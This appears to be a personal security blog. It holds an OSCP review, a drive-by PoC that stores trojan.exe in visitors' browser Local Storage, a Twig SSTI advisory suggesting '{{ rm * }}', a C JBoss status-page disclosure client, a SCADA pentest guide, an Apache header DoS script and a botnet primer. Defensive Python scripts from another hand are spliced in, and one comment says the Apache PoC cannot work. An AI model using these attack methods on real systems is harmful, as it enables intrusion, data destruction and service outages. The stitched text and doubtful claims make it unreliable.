OSCP preparation guide and exam review

Hello guys, this is Jameel Nabbo, and here’s my review of the Offensive Security Certified Professional (OSCP) certification.


I don’t write filler and I won’t waste your time with unnecessary stuff.

First, I reserved my seat for 1 month of lab time. Along with this I work a full-time job and have a wife, I also give some time to my family, and I do freelance projects such as mobile/web development.

You can imagine how busy I am 🙂

When I set my goals to take it, this is what I did:

  • I forgot all of my social life.
  • I canceled all of my vacations.
  • I didn’t sleep more than 6 hours even on the weekend.
  • Red Bull was my friend, along with everything that contains sugar.

About my background:

I come from a full-stack development background, have some background in network security and web app pen testing, and hold some security certifications other than OFFSEC’s.

The company that I joined recently always puts pressure on me with a lot of challenges and honestly, I like that because I win every time under pressure :D. They requested the OSCP certification recently and sponsored me for the certification fees.

Preparation Before Lab:

Before buying the lab, I did all Hack The Box machines including the hard ones (it took me lots of time), and also did all the VulnHub machines which don’t have write-ups (note that I skipped all machines related to ARM).

My lovely student Selim (14 years old) and I created a small team and went over Hack The Box machines together; he was having lots of fun, and I think his presence pushed me to be better. Now we are in position 1 in the Middle East and 50 worldwide on Hack The Box 🙂

MY HTB Profile:

Lab preparation:

I got my materials from Offensive Security and took 3 days to complete the videos, and 2 days to read all the PDF content (I didn’t do the exercises). Also, I wrote a lab report but I didn’t submit it.

During the lab:

I did 35 machines on the public network, including the hardest ones (Ghost, Pain, Humble, Sufferance 🙂 this last one took me 5 days of lab time to break down; I think I’ll never forget it). I also got the text files that allowed me to unlock the other networks in the lab, but didn’t have time to go over them.

Taking the exam (the impossible mission):

Time taken: 11 hours

Points earned: all machines (100%) points.

Multiple attempts: yes, I took the exam multiple times.

Did you use Metasploit: NO

I call the exam (impossible mission) not only because of its difficulty but because I had real pressure at that time beyond the exam itself:

  • My brother went to the hospital because of an accident after I started the exam.
  • My lab stopped for 3 and a half hours because of a technical problem in the OFFSEC network.
  • I lost all of my scans and notes twice during the exam due to unexpected restarts of my VM.

With that being said, you can imagine what kind of pressure I had, especially the downtime; however, Offensive Security was generous enough to give me 3 more hours after fixing the problem, which I didn’t use.


Is the exam hard?

It’s not easy, but for sure it’s hard if you don’t have experience.

How do I know I’m ready for the exam?

It’s pretty simple: create your own exam simulation on a weekend (Sat or Sun), put a time limit on yourself (24 hours), choose 2 medium and 2 hard machines from VulnHub or Hack The Box, and see how far you progress during this simulation time. I’m really serious; this technique helped me a lot (if you fail, do it again).

How about the Buffer Overflow machine?

Take it easy, do the PDF exercise and you’ll be good to go.

What lab time should I take?

I think if you have more than 5 years’ experience, go with the one month. Otherwise take the 90 or 60 days if you can give at least 3 hours daily of your time. Please note that this is an estimate and you should have a better idea of how much time you can invest in this certification.

Is it worth it to invest time in this certification?

Well, it’s one of the most fun things I’ve done in my life, and for sure Offensive Security deserves your money when it comes to certifications and penetration testing. It’s 100% the most respected certification in the cybersecurity industry; in the end it’s not a book you read and then answer multiple-choice questions about and forget a week after taking the exam.

What if I went to the exam multiple times and failed?

Don’t ever give up, this is the real meaning of Try Harder.

Any recommendations for preparations?

Don’t ever take hints; instead do lots of research and try to understand how things work, and when you feel stuck take a step back and enumerate again from ground zero.

Also, when you take the exam the most important thing is to stay awake, therefore you need to sleep at least 10 hours before your exam’s start time (again, this is very important).

Another thing I want to point out is Windows privilege escalation (see the references section), and don’t cheat yourself by using Metasploit during the lab (I assure you it won’t help you during the exam).

Another thing: OFFSEC exams are now proctored (and I really appreciate this huge step from OFFSEC since they will take care of cheating).

Any recommendations for time management during the exam?

Yes, don’t spend more than 4 hours on each machine, and remember that if something doesn’t work then move on, and most importantly don’t make things complex 🙂

Finally: I call this the “Never give up” certification, and you should really Try Harder because there’s simply no easy way; I learned this the hard way.


For Linux privilege escalation you really don’t need more than G0tM1lk’s article (don’t use the automated Linux enumeration scripts; I’ve never used them in the exam or lab).

I also wrote a simple book combining all the techniques that I always use for Linux privilege escalation.


For Windows privilege escalation you need to read and fully understand the following two links many times and you’ll be good to go; by the way, when you go through the lab you’ll refer to the links below multiple times 🙂

Read this Webbook:

If you guys have any questions regarding the OSCP, feel free to contact me on Twitter.


Good luck,

Browser Silent Exploitation (2018) POC

Since 2010 I have been following browser exploits of the (silent Java drive-by) kind, and after 2016 I never heard of another “silent drive-by” on the markets, but another critical thing came through: browser Local Storage.

This is a working example of HTML/JavaScript browser storage exploitation.

It is an example showing how an attacker could force any PC to download an executable file onto the system just by directing the victim to visit a web page, no clicks needed.

This is unlike the old Java drive-by methods, patched for many years now, which used JAR applets to allow VBS to execute from the local system’s browser TMP folder.

This exploit works by using the browser’s Local Storage abilities. 90% of web browsers have built-in Local Storage cache abilities which allow them to store files on the system and reference these files later when revisiting the website. This allows the browser to reload images and video/SWF content of the website faster than it would by downloading the content again.

Now when the victim revisits a website in a browser with the Local Storage cache enabled by default, it will load the website faster than it did the first time, because the web browser loads the website resources from the local system rather than downloading them again.

What this means is that when a site is coded to store its video or image data in the browser’s Local Storage cache, the browser automatically downloads the file with no user input or knowledge on the part of the end user, and this file is then stored on their PC.

trojan.exe = the file the attacker wishes to have the PC download by viewing the web page.

extract.exe = the file that, when run, will extract trojan.exe from the browser’s Local Storage cache and execute it.

The thing is, Firefox for example stores this Local Storage cache in an SQL database on the local HDD. It stores this data in such a way that the image and video files are not directly on the file system; rather, base64 encodings of the files are stored as database table values to load from later.

Here is where this exploit comes to play 🙂

With this POC example provided in my GitHub repo you can see it uses simple CSS/JavaScript with HTML to store an exe file in the browser cache of any visitor to the web page.

So, any user visiting this page will automatically download trojan.exe onto their system, with no user input dialogs or notices; the exe file is on their system as soon as the page is done loading.

But the file sits in the browser cache database on their system, and now that it is downloaded it needs to be extracted and run.

This is where the attacker sends them extract.exe, the file they must now run to have the trojan.exe downloaded from viewing the web page extracted and run on the system.

extract.exe, as of version 1.0, is only designed to work with this POC.

extract.exe DOES NOT download any file and makes no internet connection at all; it simply extracts and runs the file that was silently downloaded and placed on the system by viewing the website.

The advantage of this method is that the attacker can indeed force any system viewing the site to download the file just by viewing the web page. This makes the download and placement of the file onto their system extremely hard to detect.

This would also allow attackers to force the file onto the victim’s system even if they have a strict firewall in place.

POC contents:

  • Exploit.js = a JavaScript file that silently downloads the virus onto the system.
  • Trojan.exe = an example of a cmd trojan that will be downloaded.
  • index.html = the web page carrying the malicious content.
  • Extract.exe = a file to decode the base64 data and extract it from the browser storage.
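As an added defensive example, not part of the POC or the author’s GitHub repo: a Python triage script for the SQLite storage described above. Firefox keeps DOM Local Storage in a per-profile SQLite file (webappsstore.sqlite); the table layout used here (scope, key, value) is a simplified stand-in for its webappsstore2 table and every row is constructed. The script base64-decodes each value and flags entries that decode to an executable header (MZ, ELF, ZIP/JAR) or to a large opaque blob, which is how an analyst would find a payload staged the way this post describes.

```python
import base64
import binascii
import sqlite3

# Constructed stand-in for Firefox's webappsstore.sqlite. The real file has a
# table named webappsstore2 whose columns include scope, key and value; the
# scope is the reversed origin (assumed format). All rows below are made up.
SAMPLE_ROWS = [
    ("moc.elpmaxe.:http:80", "theme", "dark"),
    ("moc.elpmaxe.:http:80", "cart", '{"items": 2}'),
    # base64 value whose decoded bytes start with the "MZ" DOS/PE header
    ("moc.live.:http:80", "video_cache_1",
     base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 500).decode()),
    # base64 value that is a small PNG: legitimate cache use, must not be flagged
    ("moc.live.:http:80", "thumb_1",
     base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 40).decode()),
]

def build_sample_db():
    """Create an in-memory SQLite DB mimicking the webappsstore2 layout (assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE webappsstore2 (scope TEXT, "key" TEXT, value TEXT)')
    conn.executemany("INSERT INTO webappsstore2 VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn

def try_b64decode(value):
    """Return the decoded bytes if value is well-formed base64, else None."""
    if len(value) < 16 or len(value) % 4:
        return None
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None

# File signatures that have no business in a web page's Local Storage.
EXECUTABLE_MAGICS = {
    b"MZ": "PE/DOS executable",
    b"\x7fELF": "ELF executable",
    b"PK\x03\x04": "ZIP/JAR archive",
}

def scan_local_storage(conn, min_blob_size=256):
    """Flag rows whose value decodes to an executable or to a large opaque blob.

    Returns a list of (scope, key, reason) tuples.
    """
    findings = []
    for scope, key, value in conn.execute('SELECT scope, "key", value FROM webappsstore2'):
        raw = try_b64decode(value)
        if raw is None:
            continue
        for magic, label in EXECUTABLE_MAGICS.items():
            if raw.startswith(magic):
                findings.append((scope, key, f"base64 value decodes to {label}"))
                break
        else:
            if len(raw) >= min_blob_size:
                findings.append((scope, key, f"large opaque base64 blob ({len(raw)} bytes)"))
    return findings

if __name__ == "__main__":
    for finding in scan_local_storage(build_sample_db()):
        print(*finding, sep=" | ")
```

To run it against a real profile, replace build_sample_db() with sqlite3.connect() on a copy of the profile’s webappsstore.sqlite, never the live file, which the running browser may hold locked. The size threshold is an assumption; tune it to what the sites in your environment legitimately cache.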


Zero Day Twig PHP template engine

Twig is a modern template engine for PHP: flexible, fast, and secure. If you have any exposure to other text-based template languages, such as Smarty, Django, or Jinja, you should feel right at home with Twig. It’s both designer and developer friendly, sticking to PHP’s principles and adding functionality useful for templating environments.

ExploitDB link:

Well, Twig {latest version} is affected by Server-Side Template Injection and {{command execution}}.


Twig <=2.4.4 contains an SSTI vulnerability which allows attackers to execute commands within the parameters, by just using {{COMMAND TO EXECUTE}} instead of the expected values (a normal integer or string), depending on the vulnerable application, which takes different params by GET or POST.


Example: by injecting this in a search param: http://localhost/search?search_key={{4*4}} > Output: 16

2. POC:



OUTPUT: list of files/directories etc….

See the screenshot below showing how it executes the command and prints out the results; this could also be {{ rm * }}, which would delete the entire application 🙂

JBoss sensitive information disclosure vulnerability

By requesting the status page with the full param set to true, JBoss will print sensitive information such as memory used, total memory, and client IP addresses. Example: http://127.0.0.1/status?full=true

ExploitDB Link:

Proof of Concept

//  main.c
//  jboss information disclosure POC
//  Created by JameelNabbo  on 2/8/18.
//  Website
//  LAB
//  CopyRight © 2018 Jameel Nabbo. All rights reserved.

#include <stdio.h>
#include <string.h>
#include <strings.h>     // bcopy()
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define BUFFER_SIZE 1024

// Resolve host, open a TCP socket and connect to host:port; exits on failure.
int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;

    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock == -1){
        perror("socket");
        exit(1);
    }
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
    }
    return sock;
}

int main(int argc, char *argv[]){
    int fd;
    ssize_t n;
    char buffer[BUFFER_SIZE];

    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }
    fd = socket_connect(argv[1], atoi(argv[2]));
    // Request the status page with full=true and print whatever comes back.
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while((n = read(fd, buffer, BUFFER_SIZE - 1)) > 0){
        buffer[n] = '\0';   // read() does not NUL-terminate the data
        fprintf(stderr, "%s", buffer);
    }
    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}
Update to version 4.2.3 or later

How to perform a SAFE SCADA network penetration test

SCADA stands for Supervisory Control and Data Acquisition. In very simple terms, SCADA defines a type of control system that is used to control and monitor facilities and industrial infrastructure. Organizations use SCADA systems to automate complex industrial processes, detect and correct problems, and measure trends over time. SCADA systems are used in industries such as water management, building and facility management, traffic management, electric power generation, etc.

SCADA systems support various protocols such as DNP3, ModBus, IEC 60870, BACnet, LonWorks, and EPICS. In this blog post we’ll stick to discussing the ModBus over TCP protocol as it is still widely used in control systems.

ModBus is a serial communication protocol used to communicate with Programmable Logic Controllers (PLCs), which can also be carried over TCP (port 502). Each device intended to communicate using Modbus is given a unique address. The devices communicate using a master-slave model where only one device (the master) can initiate a transaction (called a “query”). A slave is usually the end device on the SCADA network (valve, sensor, or meter reading) which processes the query and sends its output to the master.

A ModBus frame consists of the target device address (or broadcast address), a function code defining the requested action, a data field, and an error-checking field. By default, ModBus has no authentication or encryption, but it can be transported over SSL/TLS to prevent sniffing, spoofing and replay attacks.
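The frame layout described above, as an added example that is not part of the original post: a small Python parser for Modbus/TCP frames of the kind a passive monitor (Wireshark, or a rule in your own sensor) sees on port 502. Over TCP the serial device address travels as the unit identifier inside a 7-byte MBAP header and the RTU error-checking field is dropped, since TCP supplies the integrity check; everything else (function code, data) is the PDU the text describes. The sample frames are constructed, not captured from a real PLC, and the read/write split follows the public function-code assignments.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Public Modbus function codes (Modbus Application Protocol specification).
FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
    22: "Mask Write Register", 23: "Read/Write Multiple Registers",
}
# Function codes that change PLC state: the ones a monitoring rule should watch.
WRITE_CODES = {5, 6, 15, 16, 22, 23}
EXCEPTION_NAMES = {1: "Illegal Function", 2: "Illegal Data Address",
                   3: "Illegal Data Value", 4: "Slave Device Failure"}

@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int                  # the serial "device address" carried over TCP
    function_code: int            # exception bit (0x80) stripped
    data: bytes
    is_exception: bool
    exception_code: Optional[int]
    is_write: bool

def parse_modbus_tcp(frame: bytes) -> ModbusFrame:
    """Parse one Modbus/TCP ADU: 7-byte MBAP header followed by the PDU."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", frame[:7])
    if protocol_id != 0:
        raise ValueError(f"protocol id {protocol_id} is not Modbus (expected 0)")
    # The length field counts unit id + PDU, so the ADU is exactly 6 + length bytes.
    if len(frame) != 6 + length:
        raise ValueError(f"length field {length} does not match frame size {len(frame)}")
    pdu = frame[7:]
    is_exception = bool(pdu[0] & 0x80)
    fc = pdu[0] & 0x7F
    exc = pdu[1] if is_exception and len(pdu) > 1 else None
    return ModbusFrame(transaction_id, unit_id, fc, pdu[1:], is_exception, exc,
                       fc in WRITE_CODES and not is_exception)

def describe(f: ModbusFrame) -> str:
    name = FUNCTION_NAMES.get(f.function_code, f"FC {f.function_code}")
    if f.is_exception:
        reason = EXCEPTION_NAMES.get(f.exception_code, f.exception_code)
        return f"unit {f.unit_id}: exception '{reason}' in response to {name}"
    return f"unit {f.unit_id}: {'WRITE' if f.is_write else 'read'} {name} data={f.data.hex()}"

# Constructed sample frames (not captured from a real PLC).
SAMPLE_FRAMES = [
    bytes.fromhex("0001 0000 0006 01 03 0000 000a"),  # read 10 holding registers from 0
    bytes.fromhex("0002 0000 0006 01 06 0010 00ff"),  # write 0x00FF to register 0x0010
    bytes.fromhex("0002 0000 0003 01 86 02"),         # exception reply: illegal data address
]

def audit(frames: List[bytes]) -> Tuple[List[str], int]:
    """Return one description per frame and the count of state-changing requests."""
    parsed = [parse_modbus_tcp(f) for f in frames]
    return [describe(p) for p in parsed], sum(p.is_write for p in parsed)

if __name__ == "__main__":
    lines, writes = audit(SAMPLE_FRAMES)
    print("\n".join(lines))
    print(f"{writes} state-changing request(s) observed")
```

Classifying write function codes on the wire is the cheapest way to learn, before generating any traffic of your own, which hosts already issue state-changing commands to the PLCs; a write arriving from an address outside that set is exactly the kind of event the segregation questions in the next section are meant to rule out.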


In the diagram above, a corporate and a SCADA network are separated by a firewall. I assume that the firewall rules are properly set and no access to the SCADA network is allowed. The three major components involved in SCADA are:

Human Machine Interface/Controller Machine: Usually a Windows workstation, known as the master, used to manage and control PLCs on the network through client software. If compromised, an attacker gains access to everything on your SCADA network.

Programmable Logic Controller (PLC): A physical device with a power supply, network-enabled with the capability to talk over Ethernet networks. It could have an LCD panel showing controller status, operator messages, etc. In recent times we have seen PLCs accessible via web browsers, Telnet and SSH, exposing them to all kinds of application- and network-layer attacks. If compromised, an attacker can manipulate the input/output of your devices and cause serious damage to the organization.

End Devices (Sensor, Valve or Pump): End devices installed at the remote site. They report to PLCs over communication links such as radio, serial connections, Ethernet or direct modems. If compromised, an attacker can compromise the integrity of the environment.

Note: The above components are standard in every SCADA network. You’d probably discover other devices as well such as database servers, serial device interfaces, etc.


Recently, SCADA systems have moved from proprietary, closed networks and systems to open systems and TCP/IP networks. This has exposed these networks to the same risks that traditional computer networks face. However, this does not necessarily mean that the approach for security assessment remains the same for SCADA assessments.

From my experiences in conducting SCADA assessments, I’ve noticed that every assessment is different, and on each occasion a unique approach is required based on the system functionality and type of industry it is deployed in. In this article I will share my experience performing a SCADA assessment, and discuss what pen testing approach and tools work best for assessing these highly sensitive systems.


How to prepare?

First you have to ask these questions:

  • Are all factory default credentials changed?
  • Is access to PLCs whitelisted to authorized machines only? They should not be reachable from everywhere.
  • Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
  • Is physical access to the SCADA control center restricted?
  • Can you access the internet from the controller machine?
  • Are there any clear text services running on the SCADA network?
  • Does the organization follow a strict password policy?
  • Are the controller machines, workstations and servers patched? Are they running anti-virus software and have application whitelisting enforced?



Practically, the chances that the organization will have a SCADA test/QA environment are slim. So, we assume that you have to perform an assessment on a live network, taking into account all due care. It is advisable to be prepared before the start of an assessment and ensure that all stakeholders receive communications during each phase of testing. The high-level approach to perform a SCADA assessment includes:


Draw a network map and understand the layout:

The primary purpose of studying the network architecture is to logically understand how each component of the SCADA environment relates to the others (beware, this will be highly complex). You should understand what components are involved and how they are segregated, connected or exposed to the wider network. This phase also involves identification of the various subnets present within the network. It is important to find out whether the corporate network is separated from the SCADA network or not.



Plan your attack carefully (this is not a normal IT environment; a simple error or an out-of-control action may result in a HUGE RISK).

After you gather enough information on what you need to test and what attacks are applicable, I recommend documenting each of the test cases before attacking the target. This will keep you organized when testing extremely sensitive and fragile systems.

Exploitation stage:

Execute each exploit individually. This will help you detect the root cause in case any device unexpectedly experiences failure conditions. If this happens, you should halt testing and inform the customer. You should attempt exploiting each of the components within the SCADA network i.e. network infrastructure, web interfaces, host operating systems, PLCs, HMI, workstations – just as you would do in a traditional network pen-test.


  • Nessus (but you should control the request timing and perform the scan once for each IP)
  • smod: ModBus penetration testing framework
  • plcscan: Python script for scanning PLC devices
  • NMAP Scripts: NMAP scripts to scan PLC devices
  • Wireshark: Network sniffer
  • mbtget: Perl script to read data from PLCs
  • plcinject: Tool to inject code into PLCs.



SCADA systems are super sensitive and sometimes you may face a SCADA computer running Windows XP with 1 GB of RAM, as one of my clients had, so control all your requests and monitor the network using Wireshark before generating any traffic.


Apache 2.2.x denial of service via HTTP header request

1. Description

Sending a crafted HTTP request that contains dummy shellcode in the Cookie header will result in a 400 Bad Request response echoing the dummy code; Apache will display the message (Size of a request header field exceeds server limit) and will take some time to handle the request. Sending multiple requests will result in denial of service.

2. Proof of Concept

//Our function that sends HTTP requests to the target host
function httpGet(target)
{
    // dummy shellcode bytes, used only to bloat the Cookie header past Apache's limit
    var dumpShellCode = "0x30, 0x53, 0x76, 0x99, 0xbc, 0xd7, 0x2, 0x34,"
    + "0x39, 0x5e, 0x7b, 0xc8, 0xbd, 0xfa, 0xff, 0x5b,"
    + "0xa2, 0xe7, 0xa, 0x2d, 0x38, 0x51, 0x40, 0x62, "
    + "0xab, 0xd0, 0xf9, 0x6, 0x2f, 0x4c, 0x6d, 0x89, "
    + "0x14, 0x77, 0x5a, 0xbd, 0x68, 0x93, 0x6e, 0xd0,"
    + "0x1d, 0xd2, 0x5f, 0x6c, 0x59, 0x98, 0xf2, 0xd5,"
    + "0x68, 0x69, 0x50, 0x93, 0xa2, 0x7d, 0xbc, 0x1e,"
    + "0xf, 0x64, 0x3d, 0xaa, 0x8b, 0xe8, 0xc9, 0x25, "
    + "0x78, 0x1b, 0x3e, 0xe1, 0x84, 0x9f, 0x4a, 0x7c,"
    + "0x31, 0xf8, 0x1, 0xae, 0x57, 0x52, 0x77, 0x13, "
    + "0xea, 0x8d, 0x94, 0x17, 0x6e, 0xf9, 0x88, 0x2a,"
    + "0xe3, 0x88, 0xb1, 0x3e, 0x67, 0x4, 0x25, 0xc1, "
    + "0x5c, 0x3f, 0xe2, 0xc5, 0xb0, 0x75, 0x59, 0x36,"
    + "0xf7, 0xea, 0xd7, 0xe4, 0x91, 0x6e, 0x53, 0x2f,"
    + "0x4e, 0x11, 0xf8, 0xdb, 0xaa, 0x85, 0x84, 0x66,"
    + "0x47, 0x1c, 0xf5, 0xe2, 0xc3, 0xa0, 0x81, 0x7d,"
    + "0xa0, 0xe5, 0xc, 0x2f, 0x46, 0x47, 0x72, 0xa4, "
    + "0xa9, 0xce, 0xeb, 0x38, 0x2d, 0x6a, 0x6f, 0xcb,"
    + "0xb2, 0xd5, 0xfc, 0x1f, 0x36, 0x61, 0xd0, 0xf2,"
    + "0xbb, 0xe0, 0x49, 0x56, 0x3f, 0xf6, 0x14, 0x37,"
    + "0xe6, 0xe7, 0xca, 0x2d, 0x18, 0x83, 0x5e, 0xc0,"
    + "0xa5";
    //HTTP Request Var
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", target, false ); // false for synchronous request
    //Now filling the headers information: the oversized value goes into the Cookie header
    //(browsers treat Cookie as a forbidden request header and silently ignore this call from page script)
    xmlHttp.setRequestHeader( "Cookie", dumpShellCode );

    //Apache will respond with 400 Bad Request echoing the Cookie information, indicating that Apache can't handle the request since it exceeds the header field limit

    //sending the request
    xmlHttp.send( null );
    return xmlHttp.responseText;
}


3. Solution:

Update to version 2.4.29

4. Download POC:
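As an added defensive example (not the page’s own code), here is one Python detection pass over Apache access-log lines that serves three of the advisories above at once: the Twig SSTI section (template delimiters such as the {{4*4}} probe in a URL-decoded query string), the JBoss section (/status?full=true requested from anything other than loopback), and this Apache header DoS section (a burst of 400 responses from one client; the “Size of a request header field exceeds server limit” text itself lands in the error log, so the access log only shows the 400s). The log lines, addresses and the flood threshold are constructed or assumed.

```python
import re
from collections import Counter
from ipaddress import ip_address
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" access-log format. Every line below is constructed for this
# example; the addresses come from the documentation ranges, not a real server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2018:10:00:01 +0000] "GET /search?search_key=laptop HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2018:10:00:04 +0000] "GET /search?search_key=%7B%7B4*4%7D%7D HTTP/1.1" 200 480 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Feb/2018:10:01:00 +0000] "GET /status?full=true HTTP/1.1" 200 8231 "-" "curl/7.58.0"
198.51.100.20 - - [10/Feb/2018:10:02:30 +0000] "GET /status?full=true HTTP/1.1" 200 8231 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Feb/2018:10:03:00 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
192.0.2.9 - - [10/Feb/2018:10:03:00 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
192.0.2.9 - - [10/Feb/2018:10:03:01 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
192.0.2.9 - - [10/Feb/2018:10:03:01 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
"""

# Twig/Jinja-style delimiters; legitimate search terms practically never contain them.
TEMPLATE_SYNTAX = ("{{", "}}", "{%", "%}")

def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_template_probe(path):
    """True when the URL-decoded path/query carries template delimiters."""
    decoded = unquote(path)
    return any(tok in decoded for tok in TEMPLATE_SYNTAX)

def is_remote_status_request(ip, path):
    """True for /status?full=true reached from a non-loopback address."""
    parts = urlsplit(path)
    if parts.path.rstrip("/") != "/status":
        return False
    if parse_qs(parts.query).get("full") != ["true"]:
        return False
    try:
        return not ip_address(ip).is_loopback
    except ValueError:
        return True  # unparseable source address: treat as untrusted

def detect(log_text, bad_request_threshold=3):
    """Run all three rules over the log; return a list of (rule, ip, detail)."""
    findings = []
    bad_requests = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], int(rec["status"])
        if is_template_probe(path):
            findings.append(("ssti_probe", ip, unquote(path)))
        if is_remote_status_request(ip, path):
            findings.append(("status_page_exposed", ip, path))
        if status == 400:
            bad_requests[ip] += 1
    for ip, n in bad_requests.items():
        if n >= bad_request_threshold:
            findings.append(("bad_request_flood", ip, f"{n} x HTTP 400"))
    return findings

if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG):
        print(f"{rule:20} {ip:15} {detail}")
```

The threshold of three 400s is a placeholder; in production you would count per client within a time window rather than over the whole file, and compare against the request-header limit Apache enforces through its LimitRequestFieldSize directive.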

Learn how cyber criminals use botnets

The reality is that there are millions of botnet-affected computers and other networking devices out there, yet identifying any of them is very hard. To the end user everything seems as it should be: no issues connecting to the internet and no problems on the PC itself; however, it might already have been turned into a zombie, also known as a bot.

The more compromised computers become bots, the larger and more powerful the botnet becomes. What happens is that each of the zombie computers calls home to what is called a C&C Server (Command & Control). C&C is software; however, it runs on a server, therefore people refer to it as a C&C Server.

The attacker is now able to control all bots from the C&C Server and do as he or she wishes.

Origin of a botnet

A botnet is so powerful that it doesn’t necessarily require anything to be clicked on, but of course you can find those types of botnets too. The reality is that, being malware, a bot can be picked up from social networking sites, e-mails, free software downloads, YouTube videos, and free movie downloads. Similarly to spyware, it can be obtained from many sources, and once your computer is infected it can start to spread to all the devices on the same network as the infected device. For example, if you have a computer, a laptop, an Xbox, and a mobile phone on your home network and one of them is infected, believe me, all your devices will be infected. It can be self-spreading at some point; however, it starts when you download trusted free software from an untrusted source, which might contain a bot hidden inside a Trojan type of virus. It might come in another form, such as a dodgy e-mail saying that you have been chosen and won x amount of money, so you must click on the link to claim your winnings. Again, when you click on that link, you wouldn’t realize that the Trojan is already installing itself on your computer. Therefore it’s very dangerous and nearly impossible to know if your PC might already be a zombie. Additionally, it can come from infected media such as a USB stick, or nowadays even cheap smartphones bought from China can contain Trojans that would spread to other networking devices and create a robot network.

Relation between the bot and the C&C Server

Imagine that a torrented movie is infected with a Trojan that contains a bot, and around 2000 – 4000 people download it every day for the next three months; eventually, those 300,000 computers would become bots in a certain robot network. However, you might think: how on Earth would all those bots connect to a C&C Server? First of all, 300K computers on the same botnet is an average number. Cyber security experts have previously compromised botnets as large as 30 million zombie computers, such as BREDOLAB, which also ran under the alias OFICLA. This was a Russian botnet, and it has now been compromised, but the reality is that we just don’t know, or at least cannot be sure, how many botnets are out there.

So, back to the victim’s computer: once the bot installs itself (the so-called BOT binary), it still has to find a way to connect to the C&C Server so the two can communicate and exchange messages. The BOT binary can contain a hardcoded IP address that it reaches out to over the internet so the C&C Server can find its bots. However, there are other methods too. Another common way is that a particular domain name is written into the BOT binary, which it contacts to find its master C&C Server. Either way, once the zombie computer registers itself with the C&C Server, it officially becomes a bot, and the robot network army begins to grow.

Botnet purpose

There are good intentions too for some who create and use such botnets; however, as far as we know there are very few. What I heard is that in certain countries certain websites are blocked, therefore a few communities are using botnets to access information that their government wouldn’t allow them to view under their law.

The reality is that botnets are used mainly by the bad guys, or, to be more specific, large underworld cyber criminal organizations.

Similarly to spyware, once your computer becomes a bot it could forward all sensitive information (usernames, passwords, bank account information) to its master, the C&C Server; however, the primary purpose of botnets goes deeper than that.

Some people only build botnets so that they can sell them to cyber criminals, and the larger the botnet, the more value it has. Of course, certain botnets contain only bots from the US, or from Europe, so those are a little cheaper; however, large botnets that have bots all over the world on different continents are more expensive. A botnet consisting of a C&C Server and 50-100 bots would sell for between $200 and $800; however, it all depends on the location of the bots too. Taking this further, large cyber criminal groups have multiple botnets, each containing 10K+ zombie computers, and they let them out for an hourly or daily fee. Again, it depends on the requirements, as well as the quantity of the bots and their location, but an average price for 5000 bots with a C&C Server is around $100 for 1 hour, or $1000/day.

When it comes to a botnet of 5000 bots, you have to understand that not all 5000 zombie computers can be used at the same time, as some of them might be turned off. However, I wanted you to understand the pricing when it comes to a marketplace.

Again, back to the purpose of botnets: some organizations use them to launch a DDoS attack (Distributed Denial of Service) against a particular company, perhaps against their competition, or it could be the revenge of an ex-employee. Either way, botnets can be used for attacks, but more and more they are used for financial gain, namely Bitcoin mining.

Bitcoin mining is very popular; however, to mine Bitcoin you must have a huge amount of combined CPU power, therefore large botnets are perfect for this exercise. This process is also known as silent Bitcoin mining. However, it must be controlled carefully, since for Bitcoin mining all the bots would use 100% CPU; the operators throttle that so the victims don’t realize their computer (bot) is silently mining Bitcoin.

Who is behind the C&C Server?

